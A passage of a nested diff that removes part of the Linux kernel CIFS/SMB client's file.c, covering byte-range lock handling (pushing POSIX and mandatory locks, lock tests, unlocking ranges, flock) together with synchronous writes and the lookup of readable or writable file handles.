+- * 3) FILE_LOCK_DEFERRED, if we will wait for some other file_lock;
+- * 4) FILE_LOCK_DEFERRED + 1, if we need to request to the server.
+- */
+-static int
+-cifs_posix_lock_set(struct file *file, struct file_lock *flock)
+-{
+-	struct cifsInodeInfo *cinode = CIFS_I(file_inode(file));
+-	int rc = FILE_LOCK_DEFERRED + 1;
+-
+-	if ((flock->fl_flags & FL_POSIX) == 0)
+-		return rc;
+-
+-	cifs_down_write(&cinode->lock_sem);
+-	if (!cinode->can_cache_brlcks) {
+-		up_write(&cinode->lock_sem);
+-		return rc;
+-	}
+-
+-	rc = posix_lock_file(file, flock, NULL);
+-	up_write(&cinode->lock_sem);
+-	return rc;
+-}
+-
+-int
+-cifs_push_mandatory_locks(struct cifsFileInfo *cfile)
+-{
+-	unsigned int xid;
+-	int rc = 0, stored_rc;
+-	struct cifsLockInfo *li, *tmp;
+-	struct cifs_tcon *tcon;
+-	unsigned int num, max_num, max_buf;
+-	LOCKING_ANDX_RANGE *buf, *cur;
+-	static const int types[] = {
+-		LOCKING_ANDX_LARGE_FILES,
+-		LOCKING_ANDX_SHARED_LOCK | LOCKING_ANDX_LARGE_FILES
+-	};
+-	int i;
+-
+-	xid = get_xid();
+-	tcon = tlink_tcon(cfile->tlink);
+-
+-	/*
+-	 * Accessing maxBuf is racy with cifs_reconnect - need to store value
+-	 * and check it before using.
+-	 */
+-	max_buf = tcon->ses->server->maxBuf;
+-	if (max_buf < (sizeof(struct smb_hdr) + sizeof(LOCKING_ANDX_RANGE))) {
+-		free_xid(xid);
+-		return -EINVAL;
+-	}
+-
+-	BUILD_BUG_ON(sizeof(struct smb_hdr) + sizeof(LOCKING_ANDX_RANGE) >
+-		     PAGE_SIZE);
+-	max_buf = min_t(unsigned int, max_buf - sizeof(struct smb_hdr),
+-			PAGE_SIZE);
+-	max_num = (max_buf - sizeof(struct smb_hdr)) /
+-						sizeof(LOCKING_ANDX_RANGE);
+-	buf = kcalloc(max_num, sizeof(LOCKING_ANDX_RANGE), GFP_KERNEL);
+-	if (!buf) {
+-		free_xid(xid);
+-		return -ENOMEM;
+-	}
+-
+-	for (i = 0; i < 2; i++) {
+-		cur = buf;
+-		num = 0;
+-		list_for_each_entry_safe(li, tmp, &cfile->llist->locks, llist) {
+-			if (li->type != types[i])
+-				continue;
+-			cur->Pid = cpu_to_le16(li->pid);
+-			cur->LengthLow = cpu_to_le32((u32)li->length);
+-			cur->LengthHigh = cpu_to_le32((u32)(li->length>>32));
+-			cur->OffsetLow = cpu_to_le32((u32)li->offset);
+-			cur->OffsetHigh = cpu_to_le32((u32)(li->offset>>32));
+-			if (++num == max_num) {
+-				stored_rc = cifs_lockv(xid, tcon,
+-						       cfile->fid.netfid,
+-						       (__u8)li->type, 0, num,
+-						       buf);
+-				if (stored_rc)
+-					rc = stored_rc;
+-				cur = buf;
+-				num = 0;
+-			} else
+-				cur++;
+-		}
+-
+-		if (num) {
+-			stored_rc = cifs_lockv(xid, tcon, cfile->fid.netfid,
+-					       (__u8)types[i], 0, num, buf);
+-			if (stored_rc)
+-				rc = stored_rc;
+-		}
+-	}
+-
+-	kfree(buf);
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static __u32
+-hash_lockowner(fl_owner_t owner)
+-{
+-	return cifs_lock_secret ^ hash32_ptr((const void *)owner);
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
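+-/*
+- * Snapshot of a posix lock, copied under flctx->flc_lock and sent to the
+- * server via CIFSSMBPosixLock once the spinlock has been dropped.
+- */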
+-struct lock_to_push {
+-	struct list_head llist;
+-	__u64 offset;
+-	__u64 length;
+-	__u32 pid;
+-	__u16 netfid;
+-	__u8 type;
+-};
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-static int
+-cifs_push_posix_locks(struct cifsFileInfo *cfile)
+-{
+-	struct inode *inode = d_inode(cfile->dentry);
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	struct file_lock *flock;
+-	struct file_lock_context *flctx = inode->i_flctx;
+-	unsigned int count = 0, i;
+-	int rc = 0, xid, type;
+-	struct list_head locks_to_send, *el;
+-	struct lock_to_push *lck, *tmp;
+-	__u64 length;
+-
+-	xid = get_xid();
+-
+-	if (!flctx)
+-		goto out;
+-
+-	spin_lock(&flctx->flc_lock);
+-	list_for_each(el, &flctx->flc_posix) {
+-		count++;
+-	}
+-	spin_unlock(&flctx->flc_lock);
+-
+-	INIT_LIST_HEAD(&locks_to_send);
+-
+-	/*
+-	 * Allocating count locks is enough because no FL_POSIX locks can be
+-	 * added to the list while we are holding cinode->lock_sem, which
+-	 * protects locking operations on this inode.
+-	 */
+-	for (i = 0; i < count; i++) {
+-		lck = kmalloc(sizeof(struct lock_to_push), GFP_KERNEL);
+-		if (!lck) {
+-			rc = -ENOMEM;
+-			goto err_out;
+-		}
+-		list_add_tail(&lck->llist, &locks_to_send);
+-	}
+-
+-	el = locks_to_send.next;
+-	spin_lock(&flctx->flc_lock);
+-	list_for_each_entry(flock, &flctx->flc_posix, fl_list) {
+-		if (el == &locks_to_send) {
+-			/*
+-			 * The list ended. We don't have enough allocated
+-			 * structures - something is really wrong.
+-			 */
+-			cifs_dbg(VFS, "Can't push all brlocks!\n");
+-			break;
+-		}
+-		length = cifs_flock_len(flock);
+-		if (flock->fl_type == F_RDLCK || flock->fl_type == F_SHLCK)
+-			type = CIFS_RDLCK;
+-		else
+-			type = CIFS_WRLCK;
+-		lck = list_entry(el, struct lock_to_push, llist);
+-		lck->pid = hash_lockowner(flock->fl_owner);
+-		lck->netfid = cfile->fid.netfid;
+-		lck->length = length;
+-		lck->type = type;
+-		lck->offset = flock->fl_start;
+-	}
+-	spin_unlock(&flctx->flc_lock);
+-
+-	list_for_each_entry_safe(lck, tmp, &locks_to_send, llist) {
+-		int stored_rc;
+-
+-		stored_rc = CIFSSMBPosixLock(xid, tcon, lck->netfid, lck->pid,
+-					     lck->offset, lck->length, NULL,
+-					     lck->type, 0);
+-		if (stored_rc)
+-			rc = stored_rc;
+-		list_del(&lck->llist);
+-		kfree(lck);
+-	}
+-
+-out:
+-	free_xid(xid);
+-	return rc;
+-err_out:
+-	list_for_each_entry_safe(lck, tmp, &locks_to_send, llist) {
+-		list_del(&lck->llist);
+-		kfree(lck);
+-	}
+-	goto out;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-static int
+-cifs_push_locks(struct cifsFileInfo *cfile)
+-{
+-	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	int rc = 0;
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(cfile->dentry->d_sb);
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-	/* we are going to update can_cache_brlcks here - need write access */
+-	cifs_down_write(&cinode->lock_sem);
+-	if (!cinode->can_cache_brlcks) {
+-		up_write(&cinode->lock_sem);
+-		return rc;
+-	}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (cap_unix(tcon->ses) &&
+-	    (CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability)) &&
+-	    ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0))
+-		rc = cifs_push_posix_locks(cfile);
+-	else
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-		rc = tcon->ses->server->ops->push_mand_locks(cfile);
+-
+-	cinode->can_cache_brlcks = false;
+-	up_write(&cinode->lock_sem);
+-	return rc;
+-}
+-
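+-/*
+- * Decode the VFS file_lock flags and type into the server's lock type and
+- * the lock/unlock/wait flags, logging any flags we do not implement.
+- */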
+-static void
+-cifs_read_flock(struct file_lock *flock, __u32 *type, int *lock, int *unlock,
+-		bool *wait_flag, struct TCP_Server_Info *server)
+-{
+-	if (flock->fl_flags & FL_POSIX)
+-		cifs_dbg(FYI, "Posix\n");
+-	if (flock->fl_flags & FL_FLOCK)
+-		cifs_dbg(FYI, "Flock\n");
+-	if (flock->fl_flags & FL_SLEEP) {
+-		cifs_dbg(FYI, "Blocking lock\n");
+-		*wait_flag = true;
+-	}
+-	if (flock->fl_flags & FL_ACCESS)
+-		cifs_dbg(FYI, "Process suspended by mandatory locking - not implemented yet\n");
+-	if (flock->fl_flags & FL_LEASE)
+-		cifs_dbg(FYI, "Lease on file - not implemented yet\n");
+-	if (flock->fl_flags &
+-	    (~(FL_POSIX | FL_FLOCK | FL_SLEEP |
+-	       FL_ACCESS | FL_LEASE | FL_CLOSE | FL_OFDLCK)))
+-		cifs_dbg(FYI, "Unknown lock flags 0x%x\n", flock->fl_flags);
+-
+-	*type = server->vals->large_lock_type;
+-	if (flock->fl_type == F_WRLCK) {
+-		cifs_dbg(FYI, "F_WRLCK\n");
+-		*type |= server->vals->exclusive_lock_type;
+-		*lock = 1;
+-	} else if (flock->fl_type == F_UNLCK) {
+-		cifs_dbg(FYI, "F_UNLCK\n");
+-		*type |= server->vals->unlock_lock_type;
+-		*unlock = 1;
+-		/* Check if unlock includes more than one lock range */
+-	} else if (flock->fl_type == F_RDLCK) {
+-		cifs_dbg(FYI, "F_RDLCK\n");
+-		*type |= server->vals->shared_lock_type;
+-		*lock = 1;
+-	} else if (flock->fl_type == F_EXLCK) {
+-		cifs_dbg(FYI, "F_EXLCK\n");
+-		*type |= server->vals->exclusive_lock_type;
+-		*lock = 1;
+-	} else if (flock->fl_type == F_SHLCK) {
+-		cifs_dbg(FYI, "F_SHLCK\n");
+-		*type |= server->vals->shared_lock_type;
+-		*lock = 1;
+-	} else
+-		cifs_dbg(FYI, "Unknown type of lock\n");
+-}
+-
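+-/*
+- * Handle F_GETLK: check for a conflicting lock locally, then probe the
+- * server with a lock/unlock pair if no local conflict is found.
+- */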
+-static int
+-cifs_getlk(struct file *file, struct file_lock *flock, __u32 type,
+-	   bool wait_flag, bool posix_lck, unsigned int xid)
+-{
+-	int rc = 0;
+-	__u64 length = cifs_flock_len(flock);
+-	struct cifsFileInfo *cfile = (struct cifsFileInfo *)file->private_data;
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	__u16 netfid = cfile->fid.netfid;
+-
+-	if (posix_lck) {
+-		int posix_lock_type;
+-
+-		rc = cifs_posix_lock_test(file, flock);
+-		if (!rc)
+-			return rc;
+-
+-		if (type & server->vals->shared_lock_type)
+-			posix_lock_type = CIFS_RDLCK;
+-		else
+-			posix_lock_type = CIFS_WRLCK;
+-		rc = CIFSSMBPosixLock(xid, tcon, netfid,
+-				      hash_lockowner(flock->fl_owner),
+-				      flock->fl_start, length, flock,
+-				      posix_lock_type, wait_flag);
+-		return rc;
+-	}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-	rc = cifs_lock_test(cfile, flock->fl_start, length, type, flock);
+-	if (!rc)
+-		return rc;
+-
+-	/* BB we could chain these into one lock request BB */
+-	rc = server->ops->mand_lock(xid, cfile, flock->fl_start, length, type,
+-				    1, 0, false);
+-	if (rc == 0) {
+-		rc = server->ops->mand_lock(xid, cfile, flock->fl_start, length,
+-					    type, 0, 1, false);
+-		flock->fl_type = F_UNLCK;
+-		if (rc != 0)
+-			cifs_dbg(VFS, "Error unlocking previously locked range %d during test of lock\n",
+-				 rc);
+-		return 0;
+-	}
+-
+-	if (type & server->vals->shared_lock_type) {
+-		flock->fl_type = F_WRLCK;
+-		return 0;
+-	}
+-
+-	type &= ~server->vals->exclusive_lock_type;
+-
+-	rc = server->ops->mand_lock(xid, cfile, flock->fl_start, length,
+-				    type | server->vals->shared_lock_type,
+-				    1, 0, false);
+-	if (rc == 0) {
+-		rc = server->ops->mand_lock(xid, cfile, flock->fl_start, length,
+-			type | server->vals->shared_lock_type, 0, 1, false);
+-		flock->fl_type = F_RDLCK;
+-		if (rc != 0)
+-			cifs_dbg(VFS, "Error unlocking previously locked range %d during test of lock\n",
+-				 rc);
+-	} else
+-		flock->fl_type = F_WRLCK;
+-
+-	return 0;
+-}
+-
+-void
+-cifs_move_llist(struct list_head *source, struct list_head *dest)
+-{
+-	struct list_head *li, *tmp;
+-	list_for_each_safe(li, tmp, source)
+-		list_move(li, dest);
+-}
+-
+-void
+-cifs_free_llist(struct list_head *llist)
+-{
+-	struct cifsLockInfo *li, *tmp;
+-	list_for_each_entry_safe(li, tmp, llist, llist) {
+-		cifs_del_lock_waiters(li);
+-		list_del(&li->llist);
+-		kfree(li);
+-	}
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-int
+-cifs_unlock_range(struct cifsFileInfo *cfile, struct file_lock *flock,
+-		  unsigned int xid)
+-{
+-	int rc = 0, stored_rc;
+-	static const int types[] = {
+-		LOCKING_ANDX_LARGE_FILES,
+-		LOCKING_ANDX_SHARED_LOCK | LOCKING_ANDX_LARGE_FILES
+-	};
+-	unsigned int i;
+-	unsigned int max_num, num, max_buf;
+-	LOCKING_ANDX_RANGE *buf, *cur;
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
+-	struct cifsLockInfo *li, *tmp;
+-	__u64 length = cifs_flock_len(flock);
+-	struct list_head tmp_llist;
+-
+-	INIT_LIST_HEAD(&tmp_llist);
+-
+-	/*
+-	 * Accessing maxBuf is racy with cifs_reconnect - we need to store the
+-	 * value and check it before use.
+-	 */
+-	max_buf = tcon->ses->server->maxBuf;
+-	if (max_buf < (sizeof(struct smb_hdr) + sizeof(LOCKING_ANDX_RANGE)))
+-		return -EINVAL;
+-
+-	BUILD_BUG_ON(sizeof(struct smb_hdr) + sizeof(LOCKING_ANDX_RANGE) >
+-		     PAGE_SIZE);
+-	max_buf = min_t(unsigned int, max_buf - sizeof(struct smb_hdr),
+-			PAGE_SIZE);
+-	max_num = (max_buf - sizeof(struct smb_hdr)) /
+-						sizeof(LOCKING_ANDX_RANGE);
+-	buf = kcalloc(max_num, sizeof(LOCKING_ANDX_RANGE), GFP_KERNEL);
+-	if (!buf)
+-		return -ENOMEM;
+-
+-	cifs_down_write(&cinode->lock_sem);
+-	for (i = 0; i < 2; i++) {
+-		cur = buf;
+-		num = 0;
+-		list_for_each_entry_safe(li, tmp, &cfile->llist->locks, llist) {
+-			if (flock->fl_start > li->offset ||
+-			    (flock->fl_start + length) <
+-			    (li->offset + li->length))
+-				continue;
+-			if (current->tgid != li->pid)
+-				continue;
+-			if (types[i] != li->type)
+-				continue;
+-			if (cinode->can_cache_brlcks) {
+-				/*
+-				 * We can cache brlock requests - simply remove
+-				 * a lock from the file's list.
+-				 */
+-				list_del(&li->llist);
+-				cifs_del_lock_waiters(li);
+-				kfree(li);
+-				continue;
+-			}
+-			cur->Pid = cpu_to_le16(li->pid);
+-			cur->LengthLow = cpu_to_le32((u32)li->length);
+-			cur->LengthHigh = cpu_to_le32((u32)(li->length>>32));
+-			cur->OffsetLow = cpu_to_le32((u32)li->offset);
+-			cur->OffsetHigh = cpu_to_le32((u32)(li->offset>>32));
+-			/*
+-			 * We need to save the lock here so that we can add it
+-			 * back to the file's list if the unlock range request
+-			 * fails on the server.
+-			 */
+-			list_move(&li->llist, &tmp_llist);
+-			if (++num == max_num) {
+-				stored_rc = cifs_lockv(xid, tcon,
+-						       cfile->fid.netfid,
+-						       li->type, num, 0, buf);
+-				if (stored_rc) {
+-					/*
+-					 * We failed on the unlock range
+-					 * request - add all locks from the tmp
+-					 * list to the head of the file's list.
+-					 */
+-					cifs_move_llist(&tmp_llist,
+-							&cfile->llist->locks);
+-					rc = stored_rc;
+-				} else
+-					/*
+-					 * The unlock range request succeeded -
+-					 * free the tmp list.
+-					 */
+-					cifs_free_llist(&tmp_llist);
+-				cur = buf;
+-				num = 0;
+-			} else
+-				cur++;
+-		}
+-		if (num) {
+-			stored_rc = cifs_lockv(xid, tcon, cfile->fid.netfid,
+-					       types[i], num, 0, buf);
+-			if (stored_rc) {
+-				cifs_move_llist(&tmp_llist,
+-						&cfile->llist->locks);
+-				rc = stored_rc;
+-			} else
+-				cifs_free_llist(&tmp_llist);
+-		}
+-	}
+-
+-	up_write(&cinode->lock_sem);
+-	kfree(buf);
+-	return rc;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
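+-/*
+- * Handle F_SETLK/F_SETLKW: set or clear a byte-range lock, using the posix
+- * path when the server supports it and the mandatory path otherwise.
+- */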
+-static int
+-cifs_setlk(struct file *file, struct file_lock *flock, __u32 type,
+-	   bool wait_flag, bool posix_lck, int lock, int unlock,
+-	   unsigned int xid)
+-{
+-	int rc = 0;
+-	__u64 length = cifs_flock_len(flock);
+-	struct cifsFileInfo *cfile = (struct cifsFileInfo *)file->private_data;
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	struct inode *inode = d_inode(cfile->dentry);
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (posix_lck) {
+-		int posix_lock_type;
+-
+-		rc = cifs_posix_lock_set(file, flock);
+-		if (rc <= FILE_LOCK_DEFERRED)
+-			return rc;
+-
+-		if (type & server->vals->shared_lock_type)
+-			posix_lock_type = CIFS_RDLCK;
+-		else
+-			posix_lock_type = CIFS_WRLCK;
+-
+-		if (unlock == 1)
+-			posix_lock_type = CIFS_UNLCK;
+-
+-		rc = CIFSSMBPosixLock(xid, tcon, cfile->fid.netfid,
+-				      hash_lockowner(flock->fl_owner),
+-				      flock->fl_start, length,
+-				      NULL, posix_lock_type, wait_flag);
+-		goto out;
+-	}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-	if (lock) {
+-		struct cifsLockInfo *lock;
+-
+-		lock = cifs_lock_init(flock->fl_start, length, type,
+-				      flock->fl_flags);
+-		if (!lock)
+-			return -ENOMEM;
+-
+-		rc = cifs_lock_add_if(cfile, lock, wait_flag);
+-		if (rc < 0) {
+-			kfree(lock);
+-			return rc;
+-		}
+-		if (!rc)
+-			goto out;
+-
+-		/*
+-		 * A Windows 7 server can delay breaking a lease from read to
+-		 * None if we set a byte-range lock on a file - break it
+-		 * explicitly before sending the lock to the server to be sure
+-		 * the next read won't conflict with non-overlapping locks due
+-		 * to page reading.
+-		 */
+-		if (!CIFS_CACHE_WRITE(CIFS_I(inode)) &&
+-					CIFS_CACHE_READ(CIFS_I(inode))) {
+-			cifs_zap_mapping(inode);
+-			cifs_dbg(FYI, "Set no oplock for inode=%p due to mand locks\n",
+-				 inode);
+-			CIFS_I(inode)->oplock = 0;
+-		}
+-
+-		rc = server->ops->mand_lock(xid, cfile, flock->fl_start, length,
+-					    type, 1, 0, wait_flag);
+-		if (rc) {
+-			kfree(lock);
+-			return rc;
+-		}
+-
+-		cifs_lock_add(cfile, lock);
+-	} else if (unlock)
+-		rc = server->ops->mand_unlock_range(cfile, flock, xid);
+-
+-out:
+-	if ((flock->fl_flags & FL_POSIX) || (flock->fl_flags & FL_FLOCK)) {
+-		/*
+-		 * If this is a request to remove all locks because we
+-		 * are closing the file, it doesn't matter if the
+-		 * unlocking failed as both cifs.ko and the SMB server
+-		 * remove the lock on file close
+-		 */
+-		if (rc) {
+-			cifs_dbg(VFS, "%s failed rc=%d\n", __func__, rc);
+-			if (!(flock->fl_flags & FL_CLOSE))
+-				return rc;
+-		}
+-		rc = locks_lock_file_wait(file, flock);
+-	}
+-	return rc;
+-}
+-
+-int cifs_flock(struct file *file, int cmd, struct file_lock *fl)
+-{
+-	int rc, xid;
+-	int lock = 0, unlock = 0;
+-	bool wait_flag = false;
+-	bool posix_lck = false;
+-	struct cifs_sb_info *cifs_sb;
+-	struct cifs_tcon *tcon;
+-	struct cifsFileInfo *cfile;
+-	__u32 type;
+-
+-	xid = get_xid();
+-
+-	if (!(fl->fl_flags & FL_FLOCK)) {
+-		rc = -ENOLCK;
+-		free_xid(xid);
+-		return rc;
+-	}
+-
+-	cfile = (struct cifsFileInfo *)file->private_data;
+-	tcon = tlink_tcon(cfile->tlink);
+-
+-	cifs_read_flock(fl, &type, &lock, &unlock, &wait_flag,
+-			tcon->ses->server);
+-	cifs_sb = CIFS_FILE_SB(file);
+-
+-	if (cap_unix(tcon->ses) &&
+-	    (CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability)) &&
+-	    ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0))
+-		posix_lck = true;
+-
+-	if (!lock && !unlock) {
+-		/*
+-		 * if neither lock nor unlock was requested then there is
+-		 * nothing to do since we do not know what the operation is
+-		 */
+-		rc = -EOPNOTSUPP;
+-		free_xid(xid);
+-		return rc;
+-	}
+-
+-	rc = cifs_setlk(file, fl, type, wait_flag, posix_lck, lock, unlock,
+-			xid);
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-int cifs_lock(struct file *file, int cmd, struct file_lock *flock)
+-{
+-	int rc, xid;
+-	int lock = 0, unlock = 0;
+-	bool wait_flag = false;
+-	bool posix_lck = false;
+-	struct cifs_sb_info *cifs_sb;
+-	struct cifs_tcon *tcon;
+-	struct cifsFileInfo *cfile;
+-	__u32 type;
+-
+-	rc = -EACCES;
+-	xid = get_xid();
+-
+-	cifs_dbg(FYI, "%s: %pD2 cmd=0x%x type=0x%x flags=0x%x r=%lld:%lld\n", __func__, file, cmd,
+-		 flock->fl_flags, flock->fl_type, (long long)flock->fl_start,
+-		 (long long)flock->fl_end);
+-
+-	cfile = (struct cifsFileInfo *)file->private_data;
+-	tcon = tlink_tcon(cfile->tlink);
+-
+-	cifs_read_flock(flock, &type, &lock, &unlock, &wait_flag,
+-			tcon->ses->server);
+-	cifs_sb = CIFS_FILE_SB(file);
+-	set_bit(CIFS_INO_CLOSE_ON_LOCK, &CIFS_I(d_inode(cfile->dentry))->flags);
+-
+-	if (cap_unix(tcon->ses) &&
+-	    (CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability)) &&
+-	    ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0))
+-		posix_lck = true;
+-	/*
+-	 * BB add code here to normalize offset and length to account for
+-	 * negative length, which we cannot accept over the wire.
+-	 */
+-	if (IS_GETLK(cmd)) {
+-		rc = cifs_getlk(file, flock, type, wait_flag, posix_lck, xid);
+-		free_xid(xid);
+-		return rc;
+-	}
+-
+-	if (!lock && !unlock) {
+-		/*
+-		 * if neither lock nor unlock was requested then there is
+-		 * nothing to do since we do not know what the operation is
+-		 */
+-		free_xid(xid);
+-		return -EOPNOTSUPP;
+-	}
+-
+-	rc = cifs_setlk(file, flock, type, wait_flag, posix_lck, lock, unlock,
+-			xid);
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-/*
+- * Update the file size (if needed) after a write. Should be called with
+- * the inode->i_lock held
+- */
+-void
+-cifs_update_eof(struct cifsInodeInfo *cifsi, loff_t offset,
+-		      unsigned int bytes_written)
+-{
+-	loff_t end_of_write = offset + bytes_written;
+-
+-	if (end_of_write > cifsi->server_eof)
+-		cifsi->server_eof = end_of_write;
+-}
+-
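+-/*
+- * Synchronously write data at *offset, splitting the request to fit the
+- * server's retry size and retrying on -EAGAIN; updates the cached server
+- * EOF and i_size as bytes are written.
+- */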
+-static ssize_t
+-cifs_write(struct cifsFileInfo *open_file, __u32 pid, const char *write_data,
+-	   size_t write_size, loff_t *offset)
+-{
+-	int rc = 0;
+-	unsigned int bytes_written = 0;
+-	unsigned int total_written;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	unsigned int xid;
+-	struct dentry *dentry = open_file->dentry;
+-	struct cifsInodeInfo *cifsi = CIFS_I(d_inode(dentry));
+-	struct cifs_io_parms io_parms = {0};
+-
+-	cifs_dbg(FYI, "write %zd bytes to offset %lld of %pd\n",
+-		 write_size, *offset, dentry);
+-
+-	tcon = tlink_tcon(open_file->tlink);
+-	server = tcon->ses->server;
+-
+-	if (!server->ops->sync_write)
+-		return -ENOSYS;
+-
+-	xid = get_xid();
+-
+-	for (total_written = 0; write_size > total_written;
+-	     total_written += bytes_written) {
+-		rc = -EAGAIN;
+-		while (rc == -EAGAIN) {
+-			struct kvec iov[2];
+-			unsigned int len;
+-
+-			if (open_file->invalidHandle) {
+-				/* we could deadlock if we called
+-				   filemap_fdatawait from here, so tell
+-				   cifs_reopen_file not to flush data to
+-				   the server now */
+-				rc = cifs_reopen_file(open_file, false);
+-				if (rc != 0)
+-					break;
+-			}
+-
+-			len = min(server->ops->wp_retry_size(d_inode(dentry)),
+-				  (unsigned int)write_size - total_written);
+-			/* iov[0] is reserved for smb header */
+-			iov[1].iov_base = (char *)write_data + total_written;
+-			iov[1].iov_len = len;
+-			io_parms.pid = pid;
+-			io_parms.tcon = tcon;
+-			io_parms.offset = *offset;
+-			io_parms.length = len;
+-			rc = server->ops->sync_write(xid, &open_file->fid,
+-					&io_parms, &bytes_written, iov, 1);
+-		}
+-		if (rc || (bytes_written == 0)) {
+-			if (total_written)
+-				break;
+-			else {
+-				free_xid(xid);
+-				return rc;
+-			}
+-		} else {
+-			spin_lock(&d_inode(dentry)->i_lock);
+-			cifs_update_eof(cifsi, *offset, bytes_written);
+-			spin_unlock(&d_inode(dentry)->i_lock);
+-			*offset += bytes_written;
+-		}
+-	}
+-
+-	cifs_stats_bytes_written(tcon, total_written);
+-
+-	if (total_written > 0) {
+-		spin_lock(&d_inode(dentry)->i_lock);
+-		if (*offset > d_inode(dentry)->i_size) {
+-			i_size_write(d_inode(dentry), *offset);
+-			d_inode(dentry)->i_blocks = (512 - 1 + *offset) >> 9;
+-		}
+-		spin_unlock(&d_inode(dentry)->i_lock);
+-	}
+-	mark_inode_dirty_sync(d_inode(dentry));
+-	free_xid(xid);
+-	return total_written;
+-}
+-
+-struct cifsFileInfo *find_readable_file(struct cifsInodeInfo *cifs_inode,
+-					bool fsuid_only)
+-{
+-	struct cifsFileInfo *open_file = NULL;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(cifs_inode->netfs.inode.i_sb);
+-
+-	/* only filter by fsuid on multiuser mounts */
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MULTIUSER))
+-		fsuid_only = false;
+-
+-	spin_lock(&cifs_inode->open_file_lock);
+-	/* we could simply take the first list entry since write-only entries
+-	   are always at the end of the list, but since the first entry might
+-	   have a close pending, we go through the whole list */
+-	list_for_each_entry(open_file, &cifs_inode->openFileList, flist) {
+-		if (fsuid_only && !uid_eq(open_file->uid, current_fsuid()))
+-			continue;
+-		if (OPEN_FMODE(open_file->f_flags) & FMODE_READ) {
+-			if ((!open_file->invalidHandle)) {
+-				/* found a good file */
+-				/* lock it so it will not be closed on us */
+-				cifsFileInfo_get(open_file);
+-				spin_unlock(&cifs_inode->open_file_lock);
+-				return open_file;
+-			} /* else might as well continue, and look for
+-			     another, or simply have the caller reopen it
+-			     again rather than trying to fix this handle */
+-		} else /* write only file */
+-			break; /* write only files are last so must be done */
+-	}
+-	spin_unlock(&cifs_inode->open_file_lock);
+-	return NULL;
+-}
+-
+-/* Return -EBADF if no handle is found and general rc otherwise */
+-int
+-cifs_get_writable_file(struct cifsInodeInfo *cifs_inode, int flags,
+-		       struct cifsFileInfo **ret_file)
+-{
+-	struct cifsFileInfo *open_file, *inv_file = NULL;
+-	struct cifs_sb_info *cifs_sb;
+-	bool any_available = false;
+-	int rc = -EBADF;
+-	unsigned int refind = 0;
+-	bool fsuid_only = flags & FIND_WR_FSUID_ONLY;
+-	bool with_delete = flags & FIND_WR_WITH_DELETE;
+-	*ret_file = NULL;
+-
+-	/*
+-	 * Having a null inode here (because mapping->host was set to zero by
+-	 * the VFS or MM) should not happen, but we had reports of an oops (due
+-	 * to it being zero) during stress test cases, so we need to check for it
+-	 */
+-
+-	if (cifs_inode == NULL) {
+-		cifs_dbg(VFS, "Null inode passed to cifs_writeable_file\n");
+-		dump_stack();
+-		return rc;
+-	}
+-
+-	cifs_sb = CIFS_SB(cifs_inode->netfs.inode.i_sb);
+-
+-	/* only filter by fsuid on multiuser mounts */
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MULTIUSER))
+-		fsuid_only = false;
+-
+-	spin_lock(&cifs_inode->open_file_lock);
+-refind_writable:
+-	if (refind > MAX_REOPEN_ATT) {
+-		spin_unlock(&cifs_inode->open_file_lock);
+-		return rc;
+-	}
+-	list_for_each_entry(open_file, &cifs_inode->openFileList, flist) {
+-		if (!any_available && open_file->pid != current->tgid)
+-			continue;
+-		if (fsuid_only && !uid_eq(open_file->uid, current_fsuid()))
+-			continue;
+-		if (with_delete && !(open_file->fid.access & DELETE))
+-			continue;
+-		if (OPEN_FMODE(open_file->f_flags) & FMODE_WRITE) {
+-			if (!open_file->invalidHandle) {
+-				/* found a good writable file */
+-				cifsFileInfo_get(open_file);
+-				spin_unlock(&cifs_inode->open_file_lock);
+-				*ret_file = open_file;
+-				return 0;
+-			} else {
+-				if (!inv_file)
+-					inv_file = open_file;
+-			}
+-		}
+-	}
+-	/* couldn't find a usable FH with the same pid, try any available */
+-	if (!any_available) {
+-		any_available = true;
+-		goto refind_writable;
+-	}
+-
+-	if (inv_file) {
+-		any_available = false;
+-		cifsFileInfo_get(inv_file);
+-	}
+-
+-	spin_unlock(&cifs_inode->open_file_lock);
+-
+-	if (inv_file) {
